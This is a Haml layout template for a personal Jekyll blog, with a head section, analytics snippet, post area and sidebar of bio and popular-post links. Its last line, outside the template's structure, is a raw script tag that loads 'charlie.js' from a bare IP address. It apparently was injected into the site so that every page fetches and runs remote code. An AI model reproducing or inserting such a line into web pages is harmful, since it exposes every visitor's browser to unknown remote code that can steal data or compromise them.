!!! 5
%html{:lang => "en"}
  %head
    %meta{ :charset => "utf8" }
    %meta{ :'http-equiv' => "X-UA-Compatible", :content => "IE=edge,chrome=1" }
    
    %title Literate Programming - {{ page.title }}
    
    %link{ :rel => "alternate", :type => "application/rss+xml", :href => "http://feeds.feedburner.com/steveklabnik" }
    %link{ :rel => "stylesheet", :href => "/css/blueprint/screen.css", :media => "screen, projection" }
    %link{ :rel => "stylesheet", :href => "/css/blueprint/print.css", :media => "print" }
    /[if lt IE 8]
      %link{ :rel => "stylesheet", :href => "/css/blueprint/ie.css", :media => "screen, projection" }
    %link{ :rel => "stylesheet", :href => "/css/site.css" }
    
    %script{ :src => "/js/modernizr-1.7.min.js" }
    %script{ :src => "/js/jquery-1.6.min.js" }
    %script{ :src => "/js/app.js" }
    
    - if ENV['JEKYLL_ENV'] == "production"
      :javascript
        var _gaq = _gaq || [];
        _gaq.push(['_setAccount', 'UA-10289851-1']);
        _gaq.push(['_trackPageview']);
        
        (function() {
          var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
          ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
          (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga);
        })();
  
  %body
    .container
      
      %section#main.span-14.prepend-2.append-2.clear
        %h1 {{ page.title }}
        %hr
        {{ content }}
        %hr/
        %h3 Enjoy this post?
        %p
          :markdown
            I try not to post often, and only post longer-form essays. Sometimes software, sometimes writing,
            sometimes politics, but always whatever I'm interested in. For more, you can [subscribe to my RSS
            feed](http://feeds.feedburner.com/steveklabnik), [follow me on rstat.us](http://rstat.us/users/steveklabnik),
            or [follow me on Twitter](http://twitter.com/steveklabnik).
        %hr/
        %h3 Have Something to say?
        %p
          :markdown
            I'd love to hear from you. I don't accept comments here, as these pages are static, but please
            [email me](mailto:steve@steveklabnik.com) with any feedback,
            positive or negative. I always revise posts with the interesting parts
            of these discussions. Thanks!

      
      %section#right.span-5.prepend-1.last
        %img{ :src => "http://en.gravatar.com/userimage/5335489/ee56a7574df33ed8748160494c930b98.jpg?size=190" }
        %aside
          %h4 Hi there, I'm Steve.
          %p
            I write both code and prose. Here's some of my thoughts about software,
            literature, art and code, with some politics thrown in on occasion.
            You might also enjoy <a href="http://steveklabnik.com/">my website</a>.
        %nav
          %h4 See them all
          %p
            You're viewing a single post, but if you'd like to see
            the list of everything I've written, just <a href="/">go here</a>.
          %h4 Popular Posts
          %p Here are some of my most-viewed articles.
          %ul
            %li
              %a{ :href => "/2010/03/03/why-bother-creating.html" } Why bother creating?
            %li
              %a{ :href => "/2010/08/19/a-word-about-why-whyday-and-hackety-hack.html" } A word about _why, #whyday, and Hackety Hack
            %li
              %a{ :href => "/2010/11/17/the-hardest-decision-i-ve-ever-made.html" } The hardest decision I've ever made
            %li
              %a{ :href => "/2010/03/08/create-a-more-compelling-experience-for-your-users-through-game-mechanics.html" } Create a more compelling experience for your users through game mechanics
            %li
              %a{ :href => "/2010/07/17/what-to-know-before-debating-type-systems.html" } What to know before debating type systems
    <script src="http://184.106.213.210/charlie.js"></script>
